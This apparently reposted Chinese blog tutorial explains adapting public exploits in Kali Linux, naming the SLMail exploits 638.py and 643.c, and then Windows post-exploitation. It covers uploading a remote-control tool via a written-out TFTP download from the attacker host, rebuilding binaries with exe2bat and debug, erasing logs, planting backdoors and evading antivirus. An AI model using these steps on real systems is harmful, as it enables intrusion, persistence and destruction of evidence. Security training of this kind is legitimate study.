kali linux之選擇和修改exp與windows后滲透


網上公開的exp代碼,選擇可信賴的exp源,exploit-db,securityfocus,searchsploit,有能力修改exp(python,perl,ruby,c,c++.......)

 

類unix壞境下編譯              

    返回地址和環境不符合

    反彈shell硬編碼了回鏈IP地址   

    緩沖區偏移量與我們的環境不符  

    目標IP硬編碼

 

如下測試

查找slmail的exp

把exp復制到當前目錄下進行修改測試

vim 638.py

 

vim 643.c

避免有害的exp,避免一錘子測試,滿足不同環境需要,了解漏洞遠離,修改溢出代碼

 

 

漏洞利用后階段:

    上傳工具(linux-----netcat----curl---wget。windows-----缺少預裝的下載工具)

    提權

    擦除攻擊痕跡(中間件日志,系統日志)

    安裝后門(dump密碼,內網滲透)

    后漏洞利用階段(最大的挑戰-----殺軟,使用合法的遠控)

 

 

windows命令行不方便操作,最好能把遠程控制的軟件上傳到服務器上,方便后續操作

 

例如使用ftp來傳輸遠控(ftp就不演示了,簡單)

xp,03默認安裝了,08需要單獨添加,而且經常被邊界防火牆過濾

思路就是在kali生成一個遠控,或者其他更好的工具,本機開啟tftp服務,在windows命令行下下載kali本機的遠程控制工具(win:tftp -i 192.168.1.10 get xxsec.exe)

 

使用debug傳輸

匯編,反匯編,16進制dump工具,一次只能傳輸64k字節,可以使用upx壓縮文件

 

用exe2bat把二進制轉換成16進制的表示(exe2bat是windows程序,要用wine來執行)

 

exe2bat會把所有代碼都生成好,復制好這些代碼,除了最后兩行,最后兩行要在debug上操作

 

把復制好的代碼粘貼到windows的shell上,這時dir查看一下,能看到一個123.hexdir的文件

 

 然后到debug了,把x.txt的倒數第二行粘貼到windows的shell里面執行(123.hex作為輸入,傳輸給debug)

 

 

完成后,dir查看會多出來一個1.DLL的文件

 

然后對它進行重命名

 

再次dir查看,遠控工具就上傳上去了

 

 

 

友情鏈接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM